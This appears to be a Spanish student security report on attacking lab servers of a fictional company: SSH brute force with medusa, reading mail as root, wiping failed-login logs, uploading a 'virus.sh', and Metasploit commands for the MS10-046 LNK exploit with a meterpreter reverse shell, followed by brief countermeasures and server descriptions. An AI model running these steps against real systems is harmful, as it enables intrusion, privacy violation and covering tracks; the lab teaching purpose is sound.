trabajo de seguridad informatica 1

Ahora se procede a identificar cuál es la IP del servidor de correo en esta red. De ahora en adelante, como atacantes se debe utilizar una herramienta adecuada y no un sistema operativo Windows. En este caso se utiliza Backtrack 5

Al hacer ping a la dirección web del servicio de correo, estamos ubicando la dirección IP del servidor, es desde aquí que ya se puede pensar en planear un ataque.

Backtrack tiene herramientas de scaneo de puertos de equipos de red. Estas herramientas utilizan el software nmap para scanear puertos de red objetivo, necesarios para evaluar posibles ataques.

Zenmap es una herramienta provista de una interfaz gráfica que permite el scaneo de puertos de direcciones.

Para lograr este tipo de topología al poner únicamente la dirección IP el Zenmap automáticamente genera este código

TECSUP SEGURIDAD INFORMÁTICA

En el caso del servidor de correo, como en las demás IPs escaneadas, se muestran los puertos abiertos

Se puede observar que el puerto 22, utilizado para conexiones remotas está habilitado por lo que puede ser un buen intento un ataque por fuerza bruta, con la esperanza de que no exista ningún sistema de prevención de intrusos, felizmente, en este caso aún no existe esta solución.

Los ataques de fuerza bruta constan en el bombardeo sistematizado de contraseñas hacia una cuenta en específica de un sistema operativo. Existen comandos en Backtrack que utilizan este método como medusao hydra.

2


El comando medusa irá probando contraseñas hasta encontrar una que, dentro de su lista, nos dé la contraseña de root.

Una vez obtenida la clave se puede establecer una conexión remota con el comando ssh.

Como podemos observar estamos conectados gracias al Terminal desde root hasta root@mail con todos los privilegios posibles. Desde aquí se pueden crear y deshacer lo que se requiera. Por ejemplo, se puede ver cualquier correo electrónico enviado por cualquier usuario:

3


Sin embargo se observa desde el directorio /var/log/secure las conexiones fallidas

4


Todo buen atacante debe de ser capaz de identificar sus conexiones fallidas y eliminarlas antes que el administrador de red las descubra.

Dejando los logs de lado se pretende ahora alojar un virus que explote una vulnerabilidad.

El archivo virus.sh es el exploit que se tiene planeado instalar dentro del servidor. Para ello utilizamos el comando scp, que sirve para copiar archivos utilizando en protocolo ssh.

El archivo está adentro, sólo falta ejecutarlo.

5


Contramedida

Existen contramedidas para evitar el logo excesivo mediante ataques de fuerza bruta, para ello, el administrador deberá recurrir al archivo donde se encuentra su configuración de firewall y establecer una nueva política, esta tiene como fin bloquear conexiones entrantes que pasen un determinado número de veces en un tiempo determinable.

1.1.1.Windows Server 2008 – Web

Los servidores web son aquellos cuya tarea es alojar sitios y/o aplicaciones, las

cuales son accedidas por los clientes utilizando un navegador que se comunica

con el servidor utilizando el protocolo HTTP (hypertext markup language).

Básicamente un servidor WEB consta de un interprete HTTP el cual se mantiene

a la espera de peticiones de clientes y le responde con el contenido según sea

solicitado. El cliente, una vez recibido el código, lo interpreta y lo exhibe en

pantalla.

Además los servidores pueden disponer de un intérprete de otros lenguajes

de programación que ejecutan código embebido dentro del código HTMLde las

páginas que contiene el sitio antes de enviar el resultado al cliente. Esto se

conoce como programación de lado del servidor y utiliza lenguajes

como ASP, PHP, Perl y Ajax. Las ventajas de utilizar estos lenguajes radica en

la potencia de los mismos ejecutando tareas mas complejas como, por ejemplo

acceder a bases de datos abstrayendo al cliente de toda la operación.

6


2.1.1.1 Internet Information Services 7.0 se basa en una serie de funcionalidades y características:

Modelo de extensibilidad flexible, que permite un elevado nivel de

personalización

Potentes herramientas de diagnóstico y solución de incidencias

Administración delegada

Mayor nivel de seguridad y menor superficie de ataque

Despliegue de aplicaciones basado realmente en XCOPY

Gestión de aplicaciones y estado de salud del entorno integrados

mediante los servicios WCF (Windows Communication Foundation)

Herramientas administrativas mejoradas

7


Imagen 1: Windows Server 2008

2.1.1.1.1 Vulnerabilidad de los servicios en la Web

El protocolo HTTP (o HTTPS) representa el estándar que

posibilita la transferencia de páginas Web a través de un sistema

de solicitud y respuesta. Internet, que se utiliza principalmente

para transferir páginas Web estáticas, se ha convertido

rápidamente en una herramienta interactiva que permite

proporcionar servicios en línea. El término "aplicación Web" se

refiere a cualquier aplicación a cuya interfaz se pueda acceder en

la Web desde un simple navegador.

Hoy en día, el protocolo HTTP, la base para una determinada

cantidad de tecnologías (SOAP, Javascript, XML-RPC, etc.),

juega un indudable papel estratégico en la seguridad de sistemas

de información.

2.1.1.1.2 Impacto de los ataques en la Web

Los ataques a las aplicaciones Web siempre son dañinos ya que

proporcionan una mala imagen a la empresa. Un ataque exitoso

puede provocar cualquiera de las siguientes consecuencias:

Desfiguración de la página Web;

8


Robo de información;

Modificación de datos, y en particular la modificación de datos

personales de los usuarios;

Intrusión en el servidor Web.

2.1.1.2 Empezando el Ataque

El atacante debe, de alguna manera colocar un cebo a la víctima, para que

visite la web falsa del atacante. Hay varias maneras para hacer esto, poner

un link en cualquier página que visite la víctima, engañar a los motores de

búsqueda, o incluso, si se sabe su dirección de mail, enviarle uno para que

visite la página.

Antes del atacar el Servidor Web

1.- la siguiente imagen muestra la pagina web www.acme.com

2.- En el servidor web visualizar los puertos abiertos con el comando netstat –a –n una vez

ya instalado el servidor web

9


Imagen 2: Windows Server 2008 – netstat –a –n.

Nota: El servidor web puede ser visto desde una red externa ya que el IPS le dio

salida a internet.

Durante el ataque

Escanear las vulnerabilidades del SERVIDOR WEB

Para el ataque al servidor web usaremos una computadora con Backtrack 5.

Abrir un terminal y ejecutar el comando armitage& y saldrá una ventana donde

solo se dará clic en Start MSF

10


En la siguiente imagen se muestra que se esta realizando la conexión.

En la siguiente venta ir a hosts > Nmap Scan > Inteface Scan all TCP ports y sadrá

una pequeña ventana en donde se pone la IP del servidor Web 192.168.80.202/24

11


Imagen 3: Windows Server 2008 – metasploit.

Una vez dentro del BT nos situamos en la ruta de framework3 y

actualizamos la suite de Metasploit para obtener los últimos exploits.

msf#: cd /pentest/exploits/framework3

msf: /pentest/exploits/framework3# svnupdate

Ingresamos ahora a la consola de Metasploit:

bt: /pentest/exploits/framework3# ./msfconsole

12


msf>

Cuando cambie el prompt, buscamos el exploit que explota esta

vulnerabilidad y lo seleccionamos:

msf> search lnk

msf> use windows/browser/ms10_046_shortcut_icon_dllloader

Imagen 4: Winows Server 2008 – explota vulnerabilidades.

Veamos los parámetros necesarios para este exploit:

msf exploit(ms10_046_shortcut_icon_dllloader) > info

Comenzamos a configurar el exploit:

msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.80.202

SRVHOST => 192.168.80.202

(Donde 192.168.0.106 es la ip de la máquina atacante, donde estamos corriendo

Metasploit). Los demás parámetros los dejamos con el valor que viene por defecto.

A continuación seleccionamos un PAYLOAD, en este caso una consola de

meterpreter:

13


msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD

windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

Configuramos el PAYLOAD:

msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.80.202

LHOST => 192.168.80.202

msf exploit(ms10_046_shortcut_icon_dllloader) > set LPORT 4462

LPORT => 4462

Nota: El puerto designado anteriormente debemos cerciorarnos de que no esté

siendo utilizado por otra aplicación, ya que será el socket medio del ataque, es

decir, cuando la víctima ingrese a nuestra dirección ya sea por navegador,

explorador Windows o USB, nos dará una Shell de meterpreter a través del puerto

4462 (puede establecerse cualquier otro puerto).

14


Ahora, sólo es necesario que la máquina víctima entre en nuestra dirección:

Imagen 5:Windows Server 2008.

Cuando la máquina víctima visite la página web con su navegador será redirigido

a un recurso compartido en la máquina atacante. Entonces se abrirá el explorador

de Windows para visualizar los archivos compartidos que contienen el

archivo .LNK que produce la ejecución del PAYLOAD.

2.1.1.3 Acciones de corrección en el Web Spoofing

Web Spoofing es un ataque peligroso, y difícilmente detectable, que hoy por

hoy se puede llevar a cabo en Internet. Afortunadamente hay algunas

medidas preventivas que se pueden practicar:

a) Soluciones a corto plazo:

1.- Desactivar la opción de JavaScript en el navegador.

2.- Asegurarse en todo momento que la barra de navegación está activa.

3.- ESTA ES LA MÁS IMPORTANTE: Poner atención a las URL que se

enseñan en la barra de estado, asegurándote que siempre apuntan al sitio

que quieras entrar.

Hoy en día tanto JavaScript, como Active-X, como Java tienden a

facilitar las técnicas de spoofing, así que desde aquí recomendamos al

lector que las desactive de su navegador, al menos en los momentos que

15


vaya a transferir información critica como login, password, números de

tarjeta de crédito o cuenta bancaria, etc.

b) Soluciones a largo plazo:

Todavía no se ha descubierto ningún método para evitar este ataque.

1.1.2.FreeBSD 8.3 – TFTP.

FreeBSD es un avanzado sistema operativo para arquitecturas x86 compatibles

(como Pentium® y Athlon™), amd64 compatibles (como Opteron™,

Athlon™64 EM64T), UltraSPARC®, IA-64, PC-98 y ARM. FreeBSD es un

derivado de BSD, la versión de UNIX® desarrollada en la Universidad de

California, Berkeley. FreeBSD es desarrollado y mantenido por un numeroso

equipo de personas. El soporte para otras arquitecturas está en diferentes fases de

desarrollo.

Imagen 6: Freebsd –tftp.

2.1.1.4 CARACTERISTICAS

FreeBSD es un sistema operativo multiusuario, capaz de efectuar

multitarea con apropiación y multiproceso en plataformas compatibles

con múltiples procesadores.

16


Aunque FreeBSD no puede ser propiamente llamado UNIX, al no haber

adquirido la debida licencia de The Open Group.

El sistema FreeBSD incluye el núcleo, la estructura de ficheros del

sistema, bibliotecas de la API de C, y algunas utilidades básicas. La

versión trajo importantes mejoras como mayor apoyo para dispositivos

Bluetooth y controladores para tarjetas de sonido y red.

2.1.1.5 VERSIONES FREEBSD

Imagen 7: Versiones FreebSD.

2.1.1.6 SERVICO TFTP EN FREEBSD

La utilidad más común utilizada para realizar copias de seguridad de

dispositivos y actualizaciones es TFTP, el Trivial File Transfer Protocol.

Esta utilidad es similar a FTP, excepto que se ha desmontado en

funcionalidad con el fin de encajar en un chip, por lo que el "trivial". Los

dispositivos de hardware, como por ejemplo un router o switch Cisco,

contienen un cliente TFTP. Depende de usted para crear un servidor

17


TFTP en algún lugar de la red. El servidor TFTP se almacenará una copia

de seguridad de las configuraciones y las imágenes (o sistemas

operativos) de los dispositivos de hardware dentro de su red.

Habilitación de un servidor TFTP

Su sistema FreeBSD ya contiene un servidor TFTP, lo que significa que

no tiene que instalar ningún software adicional. Sólo tienes que activar el

servicio TFTP y configurar correctamente un directorio. Vamos a

empezar por activar el servicio. Como superusuario, use su editor favorito

para abrir el archivo /etc/inetd.conf .

tftp dgram udp wait root /usr/libexec/tftpd tftpd -s /tftpboot

#tftp dgram udp6 wait root /usr/libexec/tftpd tftpd -s /tftpboot

Imagen 8: FreeBSD: /etc/ined.conf.

Modificamos /etc/rc.conf:

Imagen 9:/etc/rc.conf

Creación de carpeta TFTPBOOT

18


Imagen 10: FreeBSD creación de carpeta tftpboot.

CONTENIDO

Imagen 11: FreeBSD.Archivos de la carpeta.

2.1.1.7 VULNERABILIDADES

2.1.1.7.1 Puertos Abiertos:

Netstat –a-n

19


Imagen 12: FreeBSD. Netstat –a-n.

*Puerto udp6 y up4 son del servicio ftp que brinda la empresa ACME.

Intruso I1:

Imagen 13: Intruso I1.

20


Imagen 14: Archivo copiado, intruso.

Se le logro obtener el archivo: magro, sin ningún problema (Vulnerabilidad alta).

2.1.1.7.2 La Vulnerabilidad De Ejecución Telnetd

Imagen 15: FreeBSD. Vulneralidad telnetd.

2.1.1.8 CONTRAMEDIDAS.

Descargar el parche correspondiente desde la siguiente ubicación y verificar la firma.

Imagen 16: FreeBSD. Poner parches.

21


Ejecutarel comando modo root.

Imagen 17: Freebsd instalación de parche.

1.1.3.UBUNTU 10.10– DNS.

Ubuntu es un sistema operativo mantenido por Canonical y la comunidad de

desarrolladores. Utiliza un núcleo Linux, y su origen está basado en Debian.

Ubuntu está orientado al usuario novel y promedio, con un fuerte enfoque en la

facilidad de uso y mejorar la experiencia de usuario. Está compuesto de múltiple

software normalmente distribuido bajo una licencia libre o de código abierto.

Imagen 18: Ubuntu 10.10.

2.1.1.9 CARACTERISTICAS

En su última versión, Ubuntu soporta oficialmente dos arquitecturas de

hardware en computadoras personales y servidores: 32-bit y 64-bit. Sin

embargo, extraoficialmente, Ubuntu ha sido portado a dos arquitecturas

más: SPARC y IA-64.

22


A partir de la versión 9.04, se empezó a ofrecer soporte oficial para

procesadores ARM, comúnmente usados en dispositivos móviles.

Al igual que la mayoría de los sistemas de escritorio basados en Linux,

Ubuntu es capaz de actualizar a la vez todas las aplicaciones instaladas en

la máquina a través de repositorios.

Ubuntu está siendo traducido a más de 130 idiomas, y cada usuario es

capaz de colaborar voluntariamente a esta causa, a través de Internet.

2.1.1.10 VERSIONES

Imagen 19: Ubuntu Versiones.

23

trabajo de seguridad informatica 1

Documents